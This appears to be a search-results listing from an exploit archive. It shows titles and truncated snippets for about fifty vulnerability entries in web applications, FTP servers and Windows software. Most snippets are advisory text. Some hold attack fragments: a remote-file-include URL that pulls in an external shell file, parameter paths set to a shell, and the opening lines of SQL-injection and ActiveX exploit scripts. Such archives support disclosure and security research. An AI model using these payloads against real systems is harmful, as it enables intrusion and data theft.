56796 matches found
WordPress IP-Logger Plugin <= 3.0 - SQL Injection Vulnerability
No description provided by source. Exploit Title: WordPress IP-Logger plugin = 3.0 SQL Injection Vulnerability Date: 2011-08-16 Author: Miroslav Stampar miroslav.stamparatgmail.com @stamparm Software Link: http://downloads.wordpress.org/plugin/ip-logger.3.0.zip Version: 3.0 tested --- PoC ---...
Microsoft Windows 2000/NT 4 Local Descriptor Table Local Privilege Escalation Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/10122/info Microsoft Windows Local Descriptor Table programming interface is prone to a privilege-escalation vulnerability. A local attacker may be able to create a malicious entry in the Local Descriptor Table. This entr...
Filezilla FTP Server <= 0.9.21 (LIST/NLST) Denial of Service Exploit
No description provided by source. ?php Filezilla FTP Server 0.9.20 beta / 0.9.21 LIST, NLST and NLST -al Denial Of Service by shinnai mail: shinnaiatautisticidotorg site: http://shinnai.altervista.org special thanks to rgod for his first advisory about STOR Denial of service, see:...
Sysax <= 5.62 Admin Interface Local Buffer Overflow
No description provided by source. !/usr/bin/python Title: Sysax = 5.62 Admin Interface Local Buffer Overflow Author: Craig Freyman @cd1zz Tested on: XP SP3 32bit Date Discovered: June 15, 2012 Vendor Contacted: June 19, 2012 Details:...
cpcommerce 1.1.0 (xss/lfi) Multiple Vulnerabilities
No description provided by source. www.BugReport.ir AmnPardaz Security Research Team Title: cpCommerce Multiple Vulnerabilities Vendor: http://cpcommerce.cpradio.org Bugs: XSS, SQL Injection , Local File Inclusion Vulnerable Version: 1.1.0 prior versions also may be affected Exploitation: Remote...
PayProCart <= 1146078425 Multiple Remote File Include Vulnerabilities
No description provided by source. google dork :powered by: profitCode exploite: http://url/index.php?proMod=http://shell.txt? discoverde by momo26 ;!!!!!!!!!!!!!!! +-------------------------------------------------------------------- + + ppalCart V2.5 EE Remote File Inclusion +...
Crystal Report Viewer 8.0.0.371 - ActiveX Denial of Service Vulnerability
No description provided by source. html Crystal Reporting Viewer v8.0.0.371 Author: Matthew Bergin Website: www.berginpentesting.com Website: www.smashthestack.org object classid='clsid:C4847596-972C-11D0-9567-00A0C9273C2A' id='target' /object script language='vbscript' targetFile =...
Barracuda Spam Firewall 3.3.x preview_email.cgi file Parameter Arbitrary File Access
No description provided by source. source: http://www.securityfocus.com/bid/19276/info Spam Firewall is prone to multiple vulnerabilities, including a directory-traversal issue, access-validation issue, and a remote command-execution issue. A remote attacker can exploit these issues to gain acces...
MacOS X 10.1.x SoftwareUpdate Arbitrary Package Installation Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/5176/info A vulnerability has been reported for MacOS X where an attacker may use SoftwareUpdate to install malicious software on the vulnerable system. SoftwareUpdate uses HTTP, without any authentication, to obtain...
AIOCP 1.3.x cp_forum_view.php choosed_language Parameter SQL Injection
No description provided by source. source: http://www.securityfocus.com/bid/20931/info All In One Control Panel AIOCP is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. Exploiting these issues could allow an attacker to steal...
NotSopureEdit <= 1.4.1 - Remote File Include Vulnerability
No description provided by source. ======================================================== NotSopureEdit = 1.4.1 Remote File Include Vulnerability ======================================================== + NotSopureEdit = 1.4.1 Remote File Include Vulnerability...
Clickbank Portal 'search.php' Cross Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/31438/info Clickbank Portal is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browse...
Cline Communications Multiple SQL Injection Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/18491/info Cline Communications is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. A successfu...
Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow
No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core'...
Air Gallery 1.0 Air Photo Browser - Multiple Vulnerabilities
No description provided by source. Document Title: =============== Air Gallery 1.0 Air Photo Browser - Multiple Vulnerabilities References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1165 Release Date: ============= 2013-12-09 Vulnerability Laboratory ID VL-ID:...
InternetNow ProxyNow 2.6/2.75 Multiple Stack and Heap Overflow Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/9500/info ProxyNow has been reported to be prone to multiple overflow vulnerabilities that may allow an attacker to execute arbitrary code in order to gain unauthorized access to a vulnerable system. The vulnerabilities...
Nullsoft Winamp <= 5.3 (Ultravox-Max-Msg) Heap Overflow DoS PoC
No description provided by source. / Nullsoft Winamp 5.31 Ultravox Ultravox-Max-Msg Heap Overflow Dos POC by cocoruderfrankruderathotmail.com,2006/10/30 use like winampunsv.exe ultravox-max-msgvalue,then the winampunsvsimple ultravox server will listen on tcp port 80,when winamp connect the serve...
bloofoxCMS 0.3.5 'search' Parameter Cross Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/36700/info bloofoxCMS is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input passed through the 'search' parameter. An attacker may leverage this issue ...
Genium CMS 2012/Q2 - Multiple Vulnerabilities
No description provided by source...
Uptime Agent 5.0.1 - Stack Overflow Vulnerability
No description provided by source. Exploit Title: Up.Time Agent 5.0.1 Stack Overflow Date: 28/11/2013 Exploit Author: Denis Andzakovic Vendor Homepage: http://www.uptimesoftware.com/ Version: 5.0.1 Tested on: Debian 7 Kernel 3.2.0, Kali Kernel 3.7 , , . '.' '. ', . , '. , .', , / / / \ \ ==/ /\ ...
PEAR 1.9.0 - Multiple Remote File Inclusion Vulnerability
No description provided by source. PEAR v.1.9.0 Multiple Remote File Inclusion Vulnerability PEAR, the PHP Extension and Application Repository @package PEAR @Version v.1.9.0 @license http://opensource.org/licenses/bsd-license.php New BSD License @link http://pear.php.net/package/PEAR Type : Remo...
vam shop 1.69 - Multiple Vulnerabilities
No description provided by source. Product: VaM Shop Vendor: Vamsoft http://vamshop.ru/ Vulnerable Version: 1,69 and probably prior versions. Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: High Credit: Security Effect Teamhttp://seceffect.tumblr.com/ Vulnerability Details...
SerWeb <= 2.1.0-dev1 2009-07-02 - Multiple RFI Vulnerabilities
No description provided by source. SerWeb = 2.1.0-dev1 2009-07-02 Multiple Remote File Inclusion Vulnerabilities D.Script : http://ftp.iptel.org/pub/serweb/daily-snapshots/ POC: /loadlang.php?SERWEBconfigdir=Shell /mainprepend.php?SERWEBfunctionsdir=Shell /loadphplib.php?PHPLIBlibdir=Shell Us =...
LifeType <= 1.0.4 - SQL Injection / Admin Credentials Disclosure Exploit
No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo LifeType = 1.0.4r3270 SQL injection / admin credentials disclosure\r\n; echo by rgod [email protected]\r\n; echo site: http://retrogod.altervista.org\r\n; echo dork: \Powered by LifeType\ \RSS 0.90\ \RSS 1.0\ \RSS 2.0...
UbiDisk File Manager 2.0 iOS - Multiple Web Vulnerabilities
No description provided by source...
iPhone MobileSafari LibTIFF Buffer Overflow
No description provided by source. $Id: safarilibtiff.rb 10394 2010-09-20 08:06:27Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of...
Webfroot Shoutbox 2.32 Remote Command Execution Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/7746/info Shoutbox is prone to an issue that may result in the execution of attacker-supplied code. The vulnerability exists due to insufficient sanitization of the 'conf' URI parameter. An attacker can exploit this...
Lodel CMS 0.7.3 Calcul-Page.PHP Remote File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/20551/info Lodel CMS is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. A successful exploit of this issue allows an attacker to execute arbitrary server-side script...
Synkron.Web 3.0 HTML Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/7833/info Synkron.web is prone to HTML injection attacks. The vulnerability exists in the search script and is a result of insufficient sanitization of malicious HTML code from user-supplied input. HTML and script code ma...
Paddelberg Topsite Script Authentication Bypass Vulnerability
No description provided by source. Exploit Title: Paddelberg's topsite-script admin auth bypass. Google Dork: intext:powered by php scripte webmaster resource Date: 8. 1. 2012 Author: Christian Inci Software Link: http://www.paddelberg.de/gratis-toplisten-script/gratis-download/ Version: = 1.23 2...
ArGoSoft FTP Server 1.2.2 .2 Weak Password Encryption Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/3029/info ArGoSoft FTP server is an FTP server for the Windows platform. A design error exists in ArGoSoft FTP which enables an authenticated user to view other users encrypted passwords. However due to a weak encryption...
osCommerce 2.2 manufacturers_id Parameter Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/9277/info A vulnerability has been reported to exist in the software that may allow a remote user to launch cross-site scripting attacks. The problem is reported to exist due to improper sanitizing of user-supplied data i...
Winds3D Viewer 3 'GetURL()' Arbitrary File Download Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/35595/info Winds3D Viewer is prone to a vulnerability that can allow malicious files to be downloaded an executed within the context of the affected browser that uses the plugin. Successfully exploiting this issue will...
Halloween Linux 4.0,RedHat Linux 6.1/6.2 imwheel Vulnerability (2)
No description provided by source. source: http://www.securityfocus.com/bid/1060/info A vulnerability exists in the 'imwheel' package for Linux. This package is known to be vulnerable to a buffer overrun in its handling of the HOME environment variable. By supplying a sufficiently long string...
Flux Player 3.1.0 iOS - Multiple Vulnerabilities
No description provided by source. Title: ====== Flux Player v3.1.0 iOS - File Include & Arbitrary File Upload Vulnerability Date: ===== 2013-07-16 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=1013 VL-ID: ===== 1013 Common Vulnerability Scoring System:...
AVCon DEP Bypass
No description provided by source. DEP Bypass for OptIn/OptOut all modules used are not aslr aware script produces a text file, copy the contents paste in the input field next to the call button discovered by Dillon Beresford import sys from struct import pack print \n===================== print...
PlutoStatus Locator 1.0pre alpha 'index.php' Local File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/27802/info PlutoStatus Locator is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability using directory-traversal strings to...
Invision Power Services Invision Board 2.0.4 Help Action HID Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/17144/info Invision Power Board is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage these issu...
Ashwebstudio Ashnews 0.83 Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/16426/info Ashnews is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script...
WordPress 2.1.3 Akismet Plugin Unspecified Vulnerability
source: http://www.securityfocus.com/bid/23965/info The WordPress Akismet plugin is prone to an unspecified vulnerability. Few technical details are currently available. We will update this BID as more information emerges...
Netsweeper WebAdmin Portal Multiple Vulnerabilities
No description provided by source...
OpenBB 1.0/1.1 Member.PHP Remote SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/7405/info It has been reported that OpenBB does not properly check input passed via the 'member.php' script. Because of this, an attacker may be able to inject arbitrary commands to the database in the context of the...
fastream netfile ftp/web server 6.5/6.7 - Directory Traversal vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/10658/info The NetFile FTP/Web Server is reported prone to a directory traversal vulnerability due to insufficient sanitization of user-supplied data. This can allow an attacker to create, view, and delete arbitrary files...
Mediatheka <= 4.2 - Remote Blind SQL Injection Exploit
No description provided by source. !/usr/bin/perl -w Mediatheka = 4.2 Remote Blind SQL Injection Exploit by athos - stakerathotmaildotit use strict; use LWP::UserAgent; my $stop,$start,$hash; my $domain = shift; my $userid = shift or my @chars = 48..57, 97..102; my $substr = 1; my $http = new...
Dr. Web Control Center 6.00.3.201111300 XSS Vulnerability
No description provided by source. Dr. Web Control Center Admin UI Remote Script Code Injection ============================================================= Affected Products/Versions -------------------------- Product Name: Dr. Web Enterprise Server Version Number: 6.00.3.201111300...
Redmine SCM Repository 0.9.x, 1.0.x - Arbitrary Command Execution
No description provided by source. $Id: redminescmexec.rb 11516 2011-01-08 01:13:26Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of...
mBlogger 1.0.04 (viewpost.php) - SQL Injection Exploit
No description provided by source...
rgb72 WCMS 1.0 'index.php' SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/31298/info rgb72 WCMS is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the...
Notepad++ CCompletion Plugin 1.19 - Stack Buffer Overflow
No description provided by source...
Sun Java System Messenger Express 6.1-13-15 - 'sid' Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/28649/info Sun Java System Messenger Express is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrar...